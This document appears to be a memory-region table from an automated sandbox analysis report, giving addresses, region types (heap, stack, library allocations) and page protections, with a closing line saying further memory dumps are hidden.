||
212E2D50000
|
heap
|
page read and write
|
||
2CC1CEC5000
|
heap
|
page read and write
|
||
212E4B42000
|
heap
|
page read and write
|
||
2209C9AE000
|
trusted library allocation
|
page read and write
|
||
22ECD0B0000
|
heap
|
page read and write
|
||
2CC1EC7F000
|
heap
|
page read and write
|
||
B6DBE7E000
|
stack
|
page read and write
|
||
5A3E000
|
stack
|
page read and write
|
||
22ECB7CB000
|
heap
|
page read and write
|
||
516E000
|
stack
|
page read and write
|
||
22ECD711000
|
heap
|
page read and write
|
||
2CC1EC19000
|
heap
|
page read and write
|
||
6DEC000
|
stack
|
page read and write
|
||
212E2BF0000
|
heap
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page read and write
|
||
6EED000
|
stack
|
page read and write
|
||
22ECD527000
|
heap
|
page read and write
|
||
220B4B30000
|
heap
|
page read and write
|
||
22ECD514000
|
heap
|
page read and write
|
||
1C1AF036000
|
trusted library allocation
|
page read and write
|
||
F77000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848960000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1ECFA000
|
heap
|
page read and write
|
||
C833F7E000
|
stack
|
page read and write
|
||
7FF848AF0000
|
trusted library allocation
|
page read and write
|
||
212E2D49000
|
heap
|
page read and write
|
||
212E4B24000
|
heap
|
page read and write
|
||
2CC1F584000
|
heap
|
page read and write
|
||
22ECD51B000
|
heap
|
page read and write
|
||
2209CC56000
|
trusted library allocation
|
page read and write
|
||
22ECD500000
|
heap
|
page read and write
|
||
5520000
|
heap
|
page read and write
|
||
10D0000
|
heap
|
page read and write
|
||
22ECB7CF000
|
heap
|
page read and write
|
||
212E4C73000
|
heap
|
page read and write
|
||
2209CF9D000
|
trusted library allocation
|
page read and write
|
||
212E4BCD000
|
heap
|
page read and write
|
||
5CBBCFE000
|
stack
|
page read and write
|
||
212E4B81000
|
heap
|
page read and write
|
||
2209CE2A000
|
trusted library allocation
|
page read and write
|
||
1030000
|
heap
|
page read and write
|
||
C83443C000
|
stack
|
page read and write
|
||
212E4B2B000
|
heap
|
page read and write
|
||
2209AAD0000
|
trusted library allocation
|
page read and write
|
||
22ECD520000
|
heap
|
page read and write
|
||
22ECBA65000
|
heap
|
page read and write
|
||
7FF8488E0000
|
trusted library allocation
|
page execute and read and write
|
||
212E4BD9000
|
heap
|
page read and write
|
||
212E4D11000
|
heap
|
page read and write
|
||
212E4B89000
|
heap
|
page read and write
|
||
7FF848AE0000
|
trusted library allocation
|
page read and write
|
||
212E2F3D000
|
heap
|
page read and write
|
||
2CC1F53E000
|
heap
|
page read and write
|
||
2CC1ECEA000
|
heap
|
page read and write
|
||
2CC1EC1E000
|
heap
|
page read and write
|
||
7FF848AB0000
|
trusted library allocation
|
page read and write
|
||
1C1C5BC3000
|
heap
|
page read and write
|
||
2CC1CC33000
|
heap
|
page read and write
|
||
1C1ABB30000
|
heap
|
page read and write
|
||
212E4BF4000
|
heap
|
page read and write
|
||
E1B60FE000
|
stack
|
page read and write
|
||
7FF848AA0000
|
trusted library allocation
|
page read and write
|
||
22ECF410000
|
trusted library allocation
|
page read and write
|
||
22ECD527000
|
heap
|
page read and write
|
||
2CC1F581000
|
heap
|
page read and write
|
||
7FF8488FC000
|
trusted library allocation
|
page execute and read and write
|
||
212E2DFB000
|
heap
|
page read and write
|
||
2793BD20000
|
heap
|
page execute and read and write
|
||
212E4D10000
|
heap
|
page read and write
|
||
212E4BA1000
|
heap
|
page read and write
|
||
2CC1EC24000
|
heap
|
page read and write
|
||
22ECBA68000
|
heap
|
page read and write
|
||
212E2DEB000
|
heap
|
page read and write
|
||
1C1ABBA8000
|
heap
|
page read and write
|
||
22ECB7CB000
|
heap
|
page read and write
|
||
1060000
|
trusted library allocation
|
page execute and read and write
|
||
2CC1EC8F000
|
heap
|
page read and write
|
||
22ECD0B4000
|
heap
|
page read and write
|
||
2CC1EAF0000
|
heap
|
page read and write
|
||
2CC1CBA9000
|
heap
|
page read and write
|
||
22ECB7C0000
|
heap
|
page read and write
|
||
212E4BBE000
|
heap
|
page read and write
|
||
50FE000
|
trusted library allocation
|
page read and write
|
||
2CC1F47F000
|
heap
|
page read and write
|
||
212E2DEB000
|
heap
|
page read and write
|
||
22ECD5DF000
|
heap
|
page read and write
|
||
7FF848A00000
|
trusted library allocation
|
page execute and read and write
|
||
12E0000
|
trusted library allocation
|
page read and write
|
||
2793BDD0000
|
heap
|
page execute and read and write
|
||
22ECD5A2000
|
heap
|
page read and write
|
||
22ECB72D000
|
heap
|
page read and write
|
||
212E4BC1000
|
heap
|
page read and write
|
||
1C1ABBEC000
|
heap
|
page read and write
|
||
2CC1CBAF000
|
heap
|
page read and write
|
||
2CC1F455000
|
heap
|
page read and write
|
||
2CC1EA0A000
|
heap
|
page read and write
|
||
212E4BE2000
|
heap
|
page read and write
|
||
E1B67FB000
|
stack
|
page read and write
|
||
22ECD5EB000
|
heap
|
page read and write
|
||
7DF473740000
|
trusted library allocation
|
page execute and read and write
|
||
22ECD6FC000
|
heap
|
page read and write
|
||
5CBBBFF000
|
stack
|
page read and write
|
||
5112000
|
trusted library allocation
|
page read and write
|
||
E1B64FE000
|
stack
|
page read and write
|
||
1C1ADB40000
|
heap
|
page execute and read and write
|
||
2793B8A0000
|
heap
|
page readonly
|
||
212E4BC6000
|
heap
|
page read and write
|
||
22ECB680000
|
heap
|
page read and write
|
||
1C1AF6EE000
|
trusted library allocation
|
page read and write
|
||
2CC1EC79000
|
heap
|
page read and write
|
||
212E4C11000
|
heap
|
page read and write
|
||
212E4D0C000
|
heap
|
page read and write
|
||
212E4B30000
|
heap
|
page read and write
|
||
B6DBFFD000
|
stack
|
page read and write
|
||
22ECD515000
|
heap
|
page read and write
|
||
12CE000
|
stack
|
page read and write
|
||
22ECBA6A000
|
heap
|
page read and write
|
||
22ECD50F000
|
heap
|
page read and write
|
||
5510000
|
heap
|
page execute and read and write
|
||
2CC1EE70000
|
heap
|
page read and write
|
||
2CC1ECBF000
|
heap
|
page read and write
|
||
2CC1CC43000
|
heap
|
page read and write
|
||
2CC1E9CA000
|
heap
|
page read and write
|
||
22ECD507000
|
heap
|
page read and write
|
||
22ECB7A2000
|
heap
|
page read and write
|
||
7FF848A70000
|
trusted library allocation
|
page read and write
|
||
212E2D40000
|
heap
|
page read and write
|
||
50EB000
|
trusted library allocation
|
page read and write
|
||
C833C3F000
|
unkown
|
page read and write
|
||
22ECD53F000
|
heap
|
page read and write
|
||
7FF8488D6000
|
trusted library allocation
|
page read and write
|
||
22ECB670000
|
heap
|
page read and write
|
||
22ECB6F0000
|
heap
|
page read and write
|
||
10CE000
|
heap
|
page read and write
|
||
C8343BE000
|
stack
|
page read and write
|
||
2CC1EA3D000
|
heap
|
page read and write
|
||
220AC881000
|
trusted library allocation
|
page read and write
|
||
2CC1EA0A000
|
heap
|
page read and write
|
||
1C1C5BFA000
|
heap
|
page read and write
|
||
22ECB7C3000
|
heap
|
page read and write
|
||
2C3D000
|
trusted library allocation
|
page read and write
|
||
2CC1E9B6000
|
heap
|
page read and write
|
||
22ECB792000
|
heap
|
page read and write
|
||
2CC1F589000
|
heap
|
page read and write
|
||
7FF848B50000
|
trusted library allocation
|
page read and write
|
||
212E4B43000
|
heap
|
page read and write
|
||
1C1ABBDE000
|
heap
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
2793B914000
|
heap
|
page read and write
|
||
C833CBE000
|
stack
|
page read and write
|
||
2CC1EC10000
|
heap
|
page read and write
|
||
22ECD5D2000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
212E2DEE000
|
heap
|
page read and write
|
||
3C68000
|
trusted library allocation
|
page read and write
|
||
212E2DCD000
|
heap
|
page read and write
|
||
51C3000
|
heap
|
page read and write
|
||
212E4BEF000
|
heap
|
page read and write
|
||
7FF848A80000
|
trusted library allocation
|
page read and write
|
||
2CC1EA05000
|
heap
|
page read and write
|
||
5C8537E000
|
stack
|
page read and write
|
||
212E2F39000
|
heap
|
page read and write
|
||
220AC890000
|
trusted library allocation
|
page read and write
|
||
2CC1E9B7000
|
heap
|
page read and write
|
||
7FF848AD0000
|
trusted library allocation
|
page read and write
|
||
220B493F000
|
heap
|
page read and write
|
||
B6DC0FD000
|
stack
|
page read and write
|
||
212E6679000
|
heap
|
page read and write
|
||
220B4939000
|
heap
|
page read and write
|
||
212E2F3A000
|
heap
|
page read and write
|
||
1C1ABDC0000
|
heap
|
page read and write
|
||
2CC1CC45000
|
heap
|
page read and write
|
||
22ECB792000
|
heap
|
page read and write
|
||
212E4D0E000
|
heap
|
page read and write
|
||
2CC1CC01000
|
heap
|
page read and write
|
||
7FF848906000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848A60000
|
trusted library allocation
|
page read and write
|
||
2CC1F3B3000
|
heap
|
page read and write
|
||
22ECD571000
|
heap
|
page read and write
|
||
2CC1EA3D000
|
heap
|
page read and write
|
||
2CC1EA03000
|
heap
|
page read and write
|
||
2CC1EC12000
|
heap
|
page read and write
|
||
22ECD5BD000
|
heap
|
page read and write
|
||
6619000
|
heap
|
page read and write
|
||
1C1AD6A4000
|
heap
|
page read and write
|
||
212E4B16000
|
heap
|
page read and write
|
||
F50000
|
trusted library allocation
|
page read and write
|
||
220B4A10000
|
heap
|
page read and write
|
||
212E4B30000
|
heap
|
page read and write
|
||
2209C881000
|
trusted library allocation
|
page read and write
|
||
2C39000
|
trusted library allocation
|
page read and write
|
||
212E4BB5000
|
heap
|
page read and write
|
||
22ECB7CB000
|
heap
|
page read and write
|
||
7FF848A40000
|
trusted library allocation
|
page read and write
|
||
220B493C000
|
heap
|
page read and write
|
||
212E4B37000
|
heap
|
page read and write
|
||
2CC1F3AD000
|
heap
|
page read and write
|
||
617E000
|
stack
|
page read and write
|
||
1C1ADAF0000
|
heap
|
page execute and read and write
|
||
2CC1EC94000
|
heap
|
page read and write
|
||
22ECD601000
|
heap
|
page read and write
|
||
2CC1F3FB000
|
heap
|
page read and write
|
||
212E4C10000
|
heap
|
page read and write
|
||
7FF8489DA000
|
trusted library allocation
|
page read and write
|
||
2CC1EA0A000
|
heap
|
page read and write
|
||
22ECD5D5000
|
heap
|
page read and write
|
There are 930 hidden memdumps, click here to show them.